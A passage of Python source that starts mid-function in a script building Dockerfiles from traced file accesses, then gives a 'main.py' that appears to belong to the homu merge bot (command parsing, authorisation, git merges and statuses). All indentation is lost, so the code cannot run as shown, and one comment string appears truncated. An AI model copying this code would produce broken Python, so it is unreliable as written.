# this tells if we might have dependencies of this type: Python Perl etc...
if oneDep.is_dependency_of(objInstance):
setUsefulDependencies.add(oneDep)
break
for filAcc in objInstance.m_ProcessFileAccesses:
oneFile = filAcc.m_objectCIM_DataFile
if oneDep and oneDep.is_executable_file(oneFile):
oneDep.AddDep(oneFile)
else:
accessedDataFiles.add(oneFile)
try:
anExec = objInstance.m_ExecutableObject
# sys.stdout.write("Add exec=%s tp=%s\n" % (anExec,str(type(anExec))))
lstBinaryExecutables.add(anExec)
except AttributeError:
pass
# Install or copy the executables.
# Beware that some of them are specifically installed: Python, Perl.
fdDockerFile.write("################################# Executables:\n")
lstPackages, unknownBinaries = G_FilesToPackagesCache.get_packages_list(lstBinaryExecutables)
for anExec in sorted(lstPackages):
InstallLinuxPackage(fdDockerFile, anExec)
fdDockerFile.write("\n")
# This must be done after the binaries are installed: For example installing Perl packages
# with CPAN needs to install Perl.
fdDockerFile.write("################################# Dependencies by program type\n")
for oneDep in setUsefulDependencies:
fdDockerFile.write("# Dependencies: %s\n" % oneDep.DependencyName)
oneDep.generate_docker_dependencies(fdDockerFile)
fdDockerFile.write("\n")
# These are not data files.
categoriesNotInclude = set([
"Temporary files",
"Pipes and terminals",
"Kernel file systems",
"System config files",
"Connected TCP sockets",
"Other TCP/IP sockets",
])
lstPackagesData, unpackagedDataFiles = G_FilesToPackagesCache.get_packages_list(accessedDataFiles)
setPythonModules, unknownDataFiles = _files_to_python_modules(unpackagedDataFiles)
if setPythonModules:
fdDockerFile.write("# Python modules:\n")
for onePyModu in sorted(setPythonModules):
InstallPipModule(fdDockerFile, onePyModu)
fdDockerFile.write("\n")
fdDockerFile.write("# Data packages:\n")
# TODO: Many of them are probably already installed.
for anExec in sorted(lstPackagesData):
InstallLinuxPackage(fdDockerFile, anExec)
fdDockerFile.write("\n")
if unknownDataFiles:
fdDockerFile.write("# Data files:\n")
# Sorted by alphabetical order.
# It would be better to sort it after filtering.
sortedDatFils = sorted(unknownDataFiles, key=lambda x: x.Name)
for datFil in sortedDatFils:
# DO NOT ADD DIRECTORIES.
if datFil.Category in categoriesNotInclude:
continue
filNam = datFil.Name
if filNam.startswith("/usr/include/"):
continue
if filNam.startswith("/usr/bin/"):
continue
if filNam.startswith("UnknownFileDescr:"):
continue
if filNam in ["-1", "stdin", "stdout", "stderr", "."]:
continue
# Primitive tests so that directories are not copied.
if filNam.endswith("/.") or filNam.endswith("/"):
continue
AddToDockerDir(filNam, datFil.Category)
fdDockerFile.write("\n")
################################################################################
|
main.py
|
import argparse
import github3
import toml
import json
import re
import functools
from . import comments
from . import utils
from .parse_issue_comment import parse_issue_comment
from .auth import verify as verify_auth
from .utils import lazy_debug
import logging
from threading import Thread, Lock, Timer
import time
import traceback
import sqlite3
import requests
from contextlib import contextmanager
from queue import Queue
import os
import sys
from enum import IntEnum, Enum
import subprocess
from .git_helper import SSH_KEY_FILE
import shlex
import random
import weakref
STATUS_TO_PRIORITY = {
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
'success': 6,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
DEFAULT_TEST_TIMEOUT = 3600 * 10
VARIABLES_RE = re.compile(r'\${([a-zA-Z_]+)}')
IGNORE_BLOCK_START = '<!-- homu-ignore:start -->'
IGNORE_BLOCK_END = '<!-- homu-ignore:end -->'
IGNORE_BLOCK_RE = re.compile(
r'<!--\s*homu-ignore:start\s*-->'
r'.*'
r'<!--\s*homu-ignore:end\s*-->',
flags=re.MULTILINE | re.DOTALL | re.IGNORECASE
)
global_cfg = {}
# Replace @mention with `@mention` to suppress pings in merge commits.
# Note: Don't replace non-mentions like "email@gmail.com".
def suppress_pings(text):
return re.sub(r'\B(@\S+)', r'`\g<1>`', text) # noqa
# Replace any text between IGNORE_BLOCK_START and IGNORE_BLOCK_END
# HTML comments with an empty string in merge commits
def suppress_ignore_block(text):
return IGNORE_BLOCK_RE.sub('', text)
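# Illustrative examples (not part of upstream homu) of the two helpers above.
def _example_suppress_helpers():
    assert suppress_pings('r? @octocat') == 'r? `@octocat`'
    # A plain e-mail address sits on a word boundary, so it is left untouched.
    assert suppress_pings('mail me at user@example.com') == 'mail me at user@example.com'
    cleaned = suppress_ignore_block(
        'keep\n<!-- homu-ignore:start -->drop<!-- homu-ignore:end -->\nkeep')
    assert cleaned == 'keep\n\nkeep'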
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(
repo_cfg['buildbot']['url'] + '/login',
allow_redirects=False,
data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
db_query_lock = Lock()
def db_query(db, *args):
with db_query_lock:
db.execute(*args)
class Repository:
treeclosed = -1
treeclosed_src = None
gh = None
gh_test_on_fork = None
label = None
db = None
def __init__(self, gh, repo_label, db):
self.gh = gh
self.repo_label = repo_label
self.db = db
db_query(
db,
'SELECT treeclosed, treeclosed_src FROM repos WHERE repo = ?',
[repo_label]
)
row = db.fetchone()
if row:
self.treeclosed = row[0]
self.treeclosed_src = row[1]
else:
self.treeclosed = -1
self.treeclosed_src = None
def update_treeclosed(self, value, src):
self.treeclosed = value
self.treeclosed_src = src
db_query(
self.db,
'DELETE FROM repos where repo = ?',
[self.repo_label]
)
if value > 0:
db_query(
self.db,
'''
INSERT INTO repos (repo, treeclosed, treeclosed_src)
VALUES (?, ?, ?)
''',
[self.repo_label, value, src]
)
def __lt__(self, other):
return self.gh < other.gh
class PullReqState:
num = 0
priority = 0
rollup = 0
squash = False
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
delegate = ''
def __init__(self, num, head_sha, status, db, repo_label, mergeable_que,
gh, owner, name, label_events, repos, test_on_fork):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.db = db
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.timeout_timer = None
self.test_started = time.time()
self.label_events = label_events
self.test_on_fork = test_on_fork
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
fmt = 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'
return fmt.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
-self.priority,
self.rollup,
self.num,
]
def __lt__(self, other):
return self.sort_key() < other.sort_key()
def get_issue(self):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
return issue
def add_comment(self, comment):
if isinstance(comment, comments.Comment):
comment = "%s\n<!-- homu: %s -->" % (
comment.render(), comment.jsonify(),
)
self.get_issue().create_comment(comment)
def change_labels(self, event):
event = self.label_events.get(event.value, {})
removes = event.get('remove', [])
adds = event.get('add', [])
unless = event.get('unless', [])
if not removes and not adds:
return
issue = self.get_issue()
labels = {label.name for label in issue.iter_labels()}
if labels.isdisjoint(unless):
labels.difference_update(removes)
labels.update(adds)
issue.replace_labels(list(labels))
def set_status(self, status):
self.status = status
if self.timeout_timer:
self.timeout_timer.cancel()
self.timeout_timer = None
db_query(
self.db,
'UPDATE pull SET status = ? WHERE repo = ? AND num = ?',
[self.status, self.repo_label, self.num]
)
# FIXME: self.try_ should also be saved in the database
if not self.try_:
db_query(
self.db,
'UPDATE pull SET merge_sha = ? WHERE repo = ? AND num = ?',
[self.merge_sha, self.repo_label, self.num]
)
def get_status(self):
if self.status == '' and self.approved_by:
if self.mergeable is not False:
return 'approved'
return self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
db_query(
self.db,
'INSERT OR REPLACE INTO mergeable (repo, num, mergeable) VALUES (?, ?, ?)', # noqa
[self.repo_label, self.num, self.mergeable]
)
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
db_query(
self.db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
db_query(
self.db,
'DELETE FROM build_res WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
db_query(
self.db,
'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
builder,
res,
url,
self.merge_sha,
])
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label].gh
if not repo:
repo = self.gh.repository(self.owner, self.name)
self.repos[self.repo_label].gh = repo
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def get_test_on_fork_repo(self):
if not self.test_on_fork:
return None
repo = self.repos[self.repo_label].gh_test_on_fork
if not repo:
repo = self.gh.repository(
self.test_on_fork['owner'],
self.test_on_fork['name'],
)
self.repos[self.repo_label].gh_test_on_fork = repo
assert repo.owner.login == self.test_on_fork['owner']
assert repo.name == self.test_on_fork['name']
return repo
def save(self):
db_query(
self.db,
'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, squash, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
self.status,
self.merge_sha,
self.title,
self.body,
self.head_sha,
self.head_ref,
self.base_ref,
self.assignee,
self.approved_by,
self.priority,
self.try_,
self.rollup,
self.squash,
self.delegate,
])
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = suppress_pings(issue.body)
self.body = suppress_ignore_block(self.body)
def fake_merge(self, repo_cfg):
if not repo_cfg.get('linear', False):
return
if repo_cfg.get('autosquash', False):
return
issue = self.get_issue()
title = issue.title
# We tell github to close the PR via the commit message, but it
# doesn't know that constitutes a merge. Edit the title so that it's
# clearer.
merged_prefix = '[merged] '
if not title.startswith(merged_prefix):
title = merged_prefix + title
issue.edit(title=title)
def change_treeclosed(self, value, src):
self.repos[self.repo_label].update_treeclosed(value, src)
def blocked_by_closed_tree(self):
treeclosed = self.repos[self.repo_label].treeclosed
return (treeclosed if self.priority < treeclosed else None,
self.repos[self.repo_label].treeclosed_src)
def start_testing(self, timeout):
self.test_started = time.time() # FIXME: Save in the local database
self.set_status('pending')
wm = weakref.WeakMethod(self.timed_out)
def timed_out():
m = wm()
if m:
m()
timer = Timer(timeout, timed_out)
timer.start()
self.timeout_timer = timer
def timed_out(self):
print('* Test timed out: {}'.format(self))
self.merge_sha = ''
self.save()
self.set_status('failure')
utils.github_create_status(
self.get_repo(),
self.head_sha,
'failure',
'',
'Test timed out',
context='homu')
self.add_comment(comments.TimedOut())
self.change_labels(LabelEvent.TIMED_OUT)
def record_retry_log(self, src, body):
# destroy ancient records
db_query(
self.db,
"DELETE FROM retry_log WHERE repo = ? AND time < date('now', ?)",
[self.repo_label, global_cfg.get('retry_log_expire', '-42 days')],
)
db_query(
self.db,
'INSERT INTO retry_log (repo, num, src, msg) VALUES (?, ?, ?, ?)',
[self.repo_label, self.num, src, body],
)
@property
def author(self):
"""
Get the GitHub login name of the author of the pull request
"""
return self.get_issue().user.login
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
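# Illustrative sketch (not in the original source) of the two small helpers above.
def _example_sha_helpers():
    assert sha_cmp('1a2b3c', '1a2b3c4d5e6f7890')        # >= 4 chars and a prefix
    assert not sha_cmp('1a2', '1a2b3c4d5e6f7890')       # too short to be trusted
    assert sha_or_blank('deadbeef') == 'deadbeef'
    assert sha_or_blank('not-a-sha') == ''               # anything non-hex is blanked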
class AuthState(IntEnum):
# Higher is more privileged
REVIEWER = 3
TRY = 2
NONE = 1
class LabelEvent(Enum):
APPROVED = 'approved'
REJECTED = 'rejected'
CONFLICT = 'conflict'
SUCCEED = 'succeed'
FAILED = 'failed'
TRY = 'try'
TRY_SUCCEED = 'try_succeed'
TRY_FAILED = 'try_failed'
EXEMPTED = 'exempted'
TIMED_OUT = 'timed_out'
INTERRUPTED = 'interrupted'
PUSHED = 'pushed'
PORTAL_TURRET_DIALOG = ["Target acquired", "Activated", "There you are"]
PORTAL_TURRET_IMAGE = "https://cloud.githubusercontent.com/assets/1617736/22222924/c07b2a1c-e16d-11e6-91b3-ac659550585c.png" # noqa
def parse_commands(body, username, user_id, repo_label, repo_cfg, state,
my_username, db, states, *, realtime=False, sha='',
command_src=''):
global global_cfg
state_changed = False
_reviewer_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.REVIEWER,
realtime,
my_username,
)
_try_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.TRY,
realtime,
my_username,
)
hooks = []
if 'hooks' in global_cfg:
hooks = list(global_cfg['hooks'].keys())
commands = parse_issue_comment(username, body, sha, my_username, hooks)
for command in commands:
found = True
if command.action == 'approve':
if not _reviewer_auth_verified():
continue
approver = command.actor
cur_sha = command.commit
# Ignore WIP PRs
is_wip = False
for wip_kw in ['WIP', 'TODO', '[WIP]', '[TODO]', '[DO NOT MERGE]']:
if state.title.upper().startswith(wip_kw):
if realtime:
state.add_comment(comments.ApprovalIgnoredWip(
sha=state.head_sha,
wip_keyword=wip_kw,
))
is_wip = True
break
if is_wip:
continue
# Sometimes, GitHub sends the head SHA of a PR as 0000000
# through the webhook. This is called a "null commit", and
# seems to happen when GitHub internally encounters a race
# condition. Last time, it happened when squashing commits
# in a PR. In this case, we just try to retrieve the head
# SHA manually.
if all(x == '0' for x in state.head_sha):
if realtime:
state.add_comment(
':bangbang: Invalid head SHA found, retrying: `{}`'
.format(state.head_sha)
)
state.head_sha = state.get_repo().pull_request(state.num).head.sha # noqa
state.save()
assert any(x != '0' for x in state.head_sha)
if state.approved_by and realtime and username != my_username:
for _state in states[state.repo_label].values():
if _state.status == 'pending':
break
else:
_state = None
lines = []
if state.status in ['failure', 'error']:
lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.') # noqa
if _state:
if state == _state:
lines.append('- This pull request is currently being tested. If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.') # noqa
else:
lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num)) # noqa
if lines:
lines.insert(0, '')
lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.') # noqa
state.add_comment('\n'.join(lines))
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.try_ = False
state.set_status('')
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(
':scream_cat: {} Please try again with `{}`.'
.format(msg, state.head_sha)
)
else:
state.add_comment(comments.Approved(
sha=state.head_sha,
approver=approver,
bot=my_username,
))
treeclosed, treeclosed_src = state.blocked_by_closed_tree()
if treeclosed:
state.add_comment(
':evergreen_tree: The tree is currently [closed]({}) for pull requests below priority {}. This pull request will be tested once the tree is reopened.' # noqa
.format(treeclosed_src, treeclosed)
)
state.change_labels(LabelEvent.APPROVED)
elif command.action == 'unapprove':
# Allow the author of a pull request to unapprove their own PR. The
# author can already perform other actions that effectively
# unapprove the PR (change the target branch, push more commits,
            # etc.), so letting them directly unapprove it is reasonable as well.
# Because verify_auth has side-effects (especially, it may leave a
# comment on the pull request if the user is not authorized), we
# need to do the author check BEFORE the verify_auth check.
if state.author != username:
if not verify_auth(username, user_id, repo_label, repo_cfg,
state, AuthState.REVIEWER, realtime,
my_username):
continue
state.approved_by = ''
state.save()
if realtime:
state.change_labels(LabelEvent.REJECTED)
elif command.action == 'prioritize':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.TRY, realtime, my_username):
continue
pvalue = command.priority
if pvalue > global_cfg['max_priority']:
if realtime:
state.add_comment(
':stop_sign: Priority higher than {} is ignored.'
.format(global_cfg['max_priority'])
)
continue
state.priority = pvalue
state.save()
elif command.action == 'delegate':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.REVIEWER, realtime, my_username):
continue
state.delegate = command.delegate_to
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'undelegate':
# TODO: why is this a TRY?
if not _try_auth_verified():
continue
state.delegate = ''
state.save()
elif command.action == 'delegate-author':
if not _reviewer_auth_verified():
continue
state.delegate = state.get_repo().pull_request(state.num).user.login # noqa
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'retry' and realtime:
if not _try_auth_verified():
continue
state.set_status('')
if realtime:
event = LabelEvent.TRY if state.try_ else LabelEvent.APPROVED
state.record_retry_log(command_src, body)
state.change_labels(event)
elif command.action in ['try', 'untry'] and realtime:
if not _try_auth_verified():
continue
if state.status == '' and state.approved_by:
state.add_comment(
':no_good: '
'Please do not `try` after a pull request has been `r+`ed.'
' If you need to `try`, unapprove (`r-`) it first.'
)
continue
state.try_ = command.action == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
if realtime and state.try_:
# If we've tried before, the status will be 'success', and this
# new try will not be picked up. Set the status back to ''
# so the try will be run again.
state.set_status('')
# `try-` just resets the `try` bit and doesn't correspond to
# any meaningful labeling events.
state.change_labels(LabelEvent.TRY)
elif command.action == 'rollup':
if not _try_auth_verified():
continue
state.rollup = command.rollup_value
state.save()
elif command.action == 'squash':
if not _try_auth_verified():
continue
state.squash = True
state.save()
elif command.action == 'unsquash':
if not _try_auth_verified():
continue
state.squash = False
state.save()
elif command.action == 'force' and realtime:
if not _try_auth_verified():
continue
if 'buildbot' in repo_cfg:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(
repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', # noqa
allow_redirects=False,
data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())), # noqa
}
)
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
if mat:
err = mat.group(1).strip()
if not err:
err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(
':bomb: Buildbot returned an error: `{}`'.format(err)
)
elif command.action == 'clean' and realtime:
if not _try_auth_verified():
continue
state.merge_sha = ''
state.init_build_res([])
state.save()
elif command.action == 'ping' and realtime:
if command.ping_type == 'portal':
state.add_comment(
":cake: {}\n\n".format(
random.choice(PORTAL_TURRET_DIALOG),
PORTAL_TURRET_IMAGE)
)
else:
state.add_comment(":sleepy: I'm awake I'm awake")
elif command.action == 'treeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(command.treeclosed_value, command_src)
state.save()
elif command.action == 'untreeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(-1, None)
state.save()
elif command.action == 'hook':
hook = command.hook_name
hook_cfg = global_cfg['hooks'][hook]
if hook_cfg['realtime'] and not realtime:
continue
if hook_cfg['access'] == "reviewer":
if not _reviewer_auth_verified():
continue
else:
if not _try_auth_verified():
continue
Thread(
target=handle_hook_response,
args=[state, hook_cfg, body, command.hook_extra]
).start()
else:
found = False
if found:
state_changed = True
return state_changed
def handle_hook_response(state, hook_cfg, body, extra_data):
post_data = {}
post_data["pull"] = state.num
post_data["body"] = body
post_data["extra_data"] = extra_data
print(post_data)
response = requests.post(hook_cfg['endpoint'], json=post_data)
print(response.text)
    # We only post a response if we're configured to have one;
    # non-realtime hooks cannot post.
if hook_cfg['has_response'] and hook_cfg['realtime']:
state.add_comment(response.text)
def git_push(git_cmd, branch, state):
merge_sha = subprocess.check_output(git_cmd('rev-parse', 'HEAD')).decode('ascii').strip() # noqa
if utils.silent_call(git_cmd('push', '-f', 'test-origin', branch)):
utils.logged_call(git_cmd('branch', '-f', 'homu-tmp', branch))
utils.logged_call(git_cmd('push', '-f', 'test-origin', 'homu-tmp'))
def inner():
utils.github_create_status(
state.get_repo(),
merge_sha,
'success',
'',
'Branch protection bypassed',
context='homu',
)
def fail(err):
state.add_comment(
':boom: Unable to create a status for {} ({})'
.format(merge_sha, err)
)
utils.retry_until(inner, fail, state)
utils.logged_call(git_cmd('push', '-f', 'test-origin', branch))
return merge_sha
def init_local_git_cmds(repo_cfg, git_cfg):
fpath = os.path.join(git_cfg["cache_dir"], repo_cfg['owner'], repo_cfg['name']) # noqa
genurl = lambda cfg: 'git@github.com:{}/{}.git'.format(cfg['owner'], cfg['name']) # noqa
if not os.path.exists(SSH_KEY_FILE):
os.makedirs(os.path.dirname(SSH_KEY_FILE), exist_ok=True)
with open(SSH_KEY_FILE, 'w') as fp:
fp.write(git_cfg['ssh_key'])
os.chmod(SSH_KEY_FILE, 0o600)
if not os.path.exists(fpath):
print("initialized local git repository at", fpath)
utils.logged_call(['git', 'init', fpath])
remotes = {
'origin': genurl(repo_cfg),
'test-origin': genurl(repo_cfg.get('test-on-fork', repo_cfg)),
}
for remote, url in remotes.items():
try:
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', remote, url]) # noqa
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', '--push', remote, url]) # noqa
except subprocess.CalledProcessError:
utils.logged_call(['git', '-C', fpath, 'remote', 'add', remote, url]) # noqa
return lambda *args: ['git', '-C', fpath] + list(args)
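# Besides writing the SSH key and configuring the remotes, the helper above returns
# a callable which merely prefixes git invocations with the local cache path.
# Illustration (hypothetical owner/name, with a cache_dir of 'cache'):
#   git_cmd = init_local_git_cmds({'owner': 'rust-lang', 'name': 'rust'}, git_cfg)
#   git_cmd('fetch', 'origin', 'master')
#   -> ['git', '-C', 'cache/rust-lang/rust', 'fetch', 'origin', 'master']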
def branch_equal_to_merge(git_cmd, state, branch):
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return utils.silent_call(git_cmd('diff', '--quiet', 'FETCH_HEAD', branch)) == 0 # noqa
def create_merge(state, repo_cfg, branch, logger, git_cfg,
ensure_merge_equal=False):
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
state.refresh()
lazy_debug(logger,
lambda: "create_merge: attempting merge {} into {} on {!r}"
.format(state.head_sha, branch, state.get_repo()))
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title,
state.body)
squash_msg = '{}\n\n{}'.format(
state.title,
state.body)
desc = 'Merge conflict'
comment = (
'This pull request and the master branch diverged in a way that cannot'
' be automatically merged. Please rebase on top of the latest master'
' branch, and let the reviewer approve again.\n'
'\n'
'<details><summary>How do I rebase?</summary>\n\n'
'Assuming `self` is your fork and `upstream` is this repository,'
' you can resolve the conflict following these steps:\n\n'
'1. `git checkout {branch}` *(switch to your branch)*\n'
'2. `git fetch upstream master` *(retrieve the latest master)*\n'
'3. `git rebase upstream/master -p` *(rebase on top of it)*\n'
'4. Follow the on-screen instruction to resolve conflicts'
' (check `git status` if you got lost).\n'
'5. `git push self {branch} --force-with-lease` *(update this PR)*\n\n'
'You may also read'
' [*Git Rebasing to Resolve Conflicts* by Drew Blessing](http://blessing.io/git/git-rebase/open-source/2015/08/23/git-rebasing-to-resolve-conflicts.html)' # noqa
' for a short tutorial.\n\n'
'Please avoid the ["**Resolve conflicts**" button](https://help.github.com/articles/resolving-a-merge-conflict-on-github/) on GitHub.' # noqa
' It uses `git merge` instead of `git rebase` which makes the PR commit' # noqa
' history more difficult to read.\n\n'
'Sometimes step 4 will complete without asking for resolution. This is'
' usually due to difference between how `Cargo.lock` conflict is'
' handled during merge and rebase. This is normal, and you should still' # noqa
' perform step 5 to update this PR.\n\n'
'</details>\n\n'
).format(branch=state.head_ref.split(':', 1)[1])
if git_cfg['local_git']:
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
utils.silent_call(git_cmd('rebase', '--abort'))
utils.silent_call(git_cmd('merge', '--abort'))
if repo_cfg.get('linear', False):
utils.logged_call(
git_cmd('checkout', '-B', branch, state.head_sha))
try:
args = [base_sha]
if repo_cfg.get('autosquash', False):
args += ['-i', '--autosquash']
utils.logged_call(git_cmd('-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
*args))
except subprocess.CalledProcessError:
if repo_cfg.get('autosquash', False):
utils.silent_call(git_cmd('rebase', '--abort'))
if utils.silent_call(git_cmd('rebase', base_sha)) == 0:
desc = 'Auto-squashing failed'
comment = ''
else:
ap = '<try>' if state.try_ else state.approved_by
text = '\nCloses: #{}\nApproved by: {}'.format(state.num, ap)
msg_code = 'cat && echo {}'.format(shlex.quote(text))
env_code = 'export GIT_COMMITTER_NAME={} && export GIT_COMMITTER_EMAIL={} && unset GIT_COMMITTER_DATE'.format(shlex.quote(git_cfg['name']), shlex.quote(git_cfg['email'])) # noqa
utils.logged_call(git_cmd('filter-branch', '-f',
'--msg-filter', msg_code,
'--env-filter', env_code,
'{}..'.format(base_sha)))
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
utils.logged_call(git_cmd(
'checkout',
'-B',
'homu-tmp',
state.head_sha))
ok = True
if repo_cfg.get('autosquash', False):
try:
merge_base_sha = subprocess.check_output(
git_cmd(
'merge-base',
base_sha,
state.head_sha)).decode('ascii').strip()
utils.logged_call(git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
'-i',
'--autosquash',
'--onto',
merge_base_sha, base_sha))
except subprocess.CalledProcessError:
desc = 'Auto-squashing failed'
comment = ''
ok = False
if state.squash:
try:
merge_base_sha = subprocess.check_output(
git_cmd(
'merge-base',
base_sha,
state.head_sha)).decode('ascii').strip()
utils.logged_call(git_cmd(
'reset',
'--soft',
merge_base_sha))
utils.logged_call(git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'commit',
'-m',
squash_msg))
except subprocess.CalledProcessError:
desc = 'Squashing failed'
comment = ''
ok = False
if ok:
utils.logged_call(git_cmd('checkout', '-B', branch, base_sha))
try:
subprocess.check_output(
git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'merge',
'heads/homu-tmp',
'--no-ff',
'-m',
merge_msg),
stderr=subprocess.STDOUT,
universal_newlines=True)
except subprocess.CalledProcessError as e:
comment += '<details><summary>Error message</summary>\n\n```text\n' # noqa
comment += e.output
comment += '\n```\n\n</details>'
pass
else:
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
raise RuntimeError('local_git must be turned on to use this feature') # noqa
# if we're merging using the GitHub API, we have no way to predict
# with certainty what the final result will be so make sure the caller
# isn't asking us to keep any promises (see also discussions at
# https://github.com/servo/homu/pull/57)
assert ensure_merge_equal is False
if branch != state.base_ref:
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
try:
merge_commit = state.get_repo().merge(
branch,
state.head_sha,
merge_msg)
except github3.models.GitHubError as e:
if e.code != 409:
raise
else:
return merge_commit.sha if merge_commit else ''
state.set_status('error')
utils.github_create_status(
state.get_repo(),
state.head_sha,
'error',
'',
desc,
context='homu')
state.add_comment(':lock: {}\n\n{}'.format(desc, comment))
state.change_labels(LabelEvent.CONFLICT)
return ''
def pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
return utils.silent_call(git_cmd('merge-base', '--is-ancestor',
base_sha, state.head_sha)) == 0
# We could fetch this from GitHub instead, but that API is being deprecated:
# https://developer.github.com/changes/2013-04-25-deprecating-merge-commit-sha/
def get_github_merge_sha(state, repo_cfg, git_cfg):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
if state.mergeable is not True:
return None
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return subprocess.check_output(git_cmd('rev-parse', 'FETCH_HEAD')).decode('ascii').strip() # noqa
def do_exemption_merge(state, logger, repo_cfg, git_cfg, url, check_merge,
reason):
try:
merge_sha = create_merge(
state,
repo_cfg,
state.base_ref,
logger,
git_cfg,
check_merge)
except subprocess.CalledProcessError:
print('* Unable to create a merge commit for the exempted PR: {}'.format(state)) # noqa
traceback.print_exc()
return False
if not merge_sha:
return False
desc = 'Test exempted'
state.set_status('success')
utils.github_create_status(state.get_repo(), state.head_sha, 'success',
url, desc, context='homu')
state.add_comment(':zap: {}: {}.'.format(desc, reason))
state.change_labels(LabelEvent.EXEMPTED)
state.merge_sha = merge_sha
state.save()
state.fake_merge(repo_cfg)
return True
